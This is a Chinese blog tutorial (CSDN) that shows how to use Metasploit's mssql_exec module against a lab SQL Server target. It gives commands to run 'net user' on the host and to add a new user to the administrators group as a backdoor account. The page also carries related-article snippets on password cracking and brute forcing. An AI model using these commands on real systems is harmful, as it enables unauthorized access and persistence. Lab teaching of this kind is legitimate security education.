3、白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下

最新推荐文章于 2023-10-19 17:37:27 发布
最新推荐文章于 2023-10-19 17:37:27 发布
阅读量298 收藏 3
点赞数
分类专栏: 科技 黑客 IT技术 文章标签: 网络 信息安全 计算机视觉 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/109149210
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

一、课前声明
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.搭建好Sql server的靶机一个;
3.整装待发的小白一个。
三、战略安排
3.1 进入Metasploit(msf)渗透测试框架,如下图所示。
命令:msfconsole
在这里插入图片描述

3.2 利用Metasploit(msf)渗透框架对目标主机漏洞利用模块进行检索,如下图所示。
命令:search mssql_exec
在这里插入图片描述

3.3 如下图所示,利用检索到的漏洞利用模块。
命令:use auxiliary/admin/mssql_exec
在这里插入图片描述

3.4 查看需要设置的攻击参数,如下图所示。
命令:show options
在这里插入图片描述
在这里插入图片描述

3.5 设置cmd命令对目标主机进行控制,如下图所示。
3.5.1 利用cmd命令查看目标主机的用户组
命令:set CMD cmd.exe /c net user
命令:run
在这里插入图片描述
在这里插入图片描述

3.5.2 利用cmd命令在目标主机上创建新的用户,并且把账户添加到管理员组中,如下图所示。
命令:set CMD cmd.exe /c net user 用户名 密码 /add&net localgroup administrator 用户名 /add
例子:set CMD cmd.exe /c net user demouser 123456 /add&net localgroup administrator demouser /add
命令:run
在这里插入图片描述
在这里插入图片描述
小编一个个字敲打创作,可辛苦了,问君可否关注一下呢?你还可搜索:Kali与编程,学习更多呢 !

点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux机器设置密码,Linux系统设置复杂安全的密码的办法
weixin_42425334的博客
05-04 1704
对于 Linux 系统的用户来说,系统管理是非常重要的,而实现强密码策略也是用户管理的其中一个重点。虽然Linux 的默认策略很安全,但密码有安全隐患,本文小编将分享在Linux系统设置复杂安全的密码,实现最安全的策略。在大多数 Linux 系统中,可以用 PAM来加强密码策略,在下面的路径可以找到这个文件:在红帽系列的系统中,路径:/etc/pam.d/system-auth。Debian 系...
Linux下暴力破解密码的工具
zsx0728的博客
09-15 5394
本文简述Linux下暴力破解密码的工具,包括 John the Ripper,Medusa,Hydra。
超简单:Linux设置密码复杂程度
Purpletaro的专栏
05-30 988
所有人都知道 Linux 的默认策略很安全,然而我们还是要做一些微调,这样才更安全。密码有安全隐患,因此,请特别注意。我们需要更改密码的复杂程度来提高安全性。 首先修改/etc/pam.d/system-auth文件: 找到 password requisite pam_cracklib.so这么一行替换成如下: passwordrequisitepam_cracklib.soretry=5difok=3minlen=10ucredit=-1lcredit=-...
Linux】基于密码字典的口令检测策略
qq_51228157的博客
12-28 1084
Linux】基于密码字典的口令检测策略UOSA版、centos、redhat
【好用】linux MySQL账号密码口令管理|不记得密码也可
woomay的博客
05-12 984
其中,new_password为新密码,username为要修改密码的账号的用户名,hostname为要修改密码的账号的主机名。以root身份登录MySQL:在终端输入 mysql -u root -p 命令,然后输入root用户的密码进行登录。以root身份登录MySQL:在终端输入 mysql -u root -p 命令,然后输入root用户的密码进行登录。注意,删除账号并不会删除该账号创建的库和表,需要另外进行处理。切换到要修改密码的账号所在的数据库:在MySQL命令行中输入 use mysql;
kali linux安全渗透程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试等
kali linux 下sqlmap注入ACCESS数据库.doc
03-04
Kali Linux 下 SQLmap 注入 ACCESS 数据库 Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面...
kali-i3:使用Vagrant和Ansible使用i3创建Kali Linux VM
02-06
本项目 "kali-i3" 专注于使用这两个工具来创建一个带有 i3 窗口管理器的 Kali Linux 虚拟机(VM)。以下将详细介绍这个过程中的关键知识点。 首先,Vagrant 是一个开源工具,用于创建和管理一致的开发环境。通过...
实验:Kali Linux破解MySQL数据库.docx
01-09
实验:Kali Linux破解MySQL数据库.docx
kalitools:Kali Linux工具清单
02-03
kalitools:Kali Linux工具清单
Linux使用超级命令爆破自己的虚拟机用户密码
qq_52072846的博客
12-08 1044
1.使用ifconfig查看自己的虚拟机ip,以及账户 2.在超级口令检查工具中填写好目标ip地址(下面是我个人虚拟机的ip)并输入账户名把线程调整至10,在密码栏中导入自己下载好的密码本,并在左侧勾选ssh即可开始检查 3.爆破成功即可显示用户的密码 ...
linux密码筛查,linux平台超简单的代{过}{滤}理ip筛选程序
weixin_39641236的博客
04-30 109
7月20日-10:42更新~感谢各位坛友的评分和鼓励啦~初来乍到的小白表示感谢吾爱~我做出来了一个v1,有兴趣的同学可以试一试鸭~增加了一丢丢细节。增加一个开头字符画~增加变量,方便大家调试~使用判断语句和提示,提高用户体验~#!/bin/bashtput setf blodecho "||======================================================...
linux系统redis密码修改,redis未授权口令检测脚本(redis未授权访问漏洞,利用redis写webshell)...
weixin_32367041的博客
05-09 714
以下如有雷同,不胜荣幸*---示例代码!!!!!----*/#!/usr/bin/envpython#_*_coding:utf-8_*_importsocketimportsysPASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']defcheck(ip,...
linux服务器密码检查,linux系统密码检测
weixin_35651102的博客
04-29 1349
需要自备密码明文字典from _utils.patrol2 import data_format,report_format,run_cmdimport platformimport cryptwith open(passwd[0],'r') as f:content=f.readlines()def use_md5(password,salt):global contentfor i in c...
linux服务器mysql密码_linux系统密码检测
weixin_39580727的博客
01-20 247
from _utils.patrol2 import data_format,report_format,run_cmdimport platformimport cryptwith open(passwd[0],'r') as f:content=f.readlines()def use_md5(password,salt):global contentfor i in content:cmd=...
Linux学习 ------ 口令检测分析用户密码
weixin_45409371的博客
08-26 2276
口令检测(John the Ripper)是一款开源的密码破解工具,能够在已知密文的情况下快速分析出明文的密码字串,支持DES 、MD5 等多种加密算法,而且允许使用密码字典(包含各种密码组合的列表文件)来进行暴力破解。我们可以通过使用 John the Ripper ,可以检测linux 系统用户密码强度。 一、下载并安装 John the Ripper 百度云分享:https:/...
kali】msf渗透windows创建用户并提权
qq_20410657的博客
10-19 369
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
基于Kali搭建SSH口令靶机并用Nmap实现排查
晓梦林的博客
05-03 2468
基于Kali搭建SSH口令靶机并用Nmap实现排查
利用kali通过ssh暴力破解Linux的系统密码
菜鸟-传奇
11-30 4375
利用kali通过ssh暴力破解Linux的系统密码 确认linux开启ssh服务 本地先创建好密码和账号文件 第一步:启动Metasoloit攻击框架 第二步:搜索SSH攻击模块 第三步:使用use命令选择模块 第四步:使用show options查看所需参数 第五步:使用set命令设置参数 threads 5 设置扫描的线程为5 Verbose True 可以显示详细的扫描...
vmwar16 安装kali
最新发布
12-24
vmwar16 安装kali

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值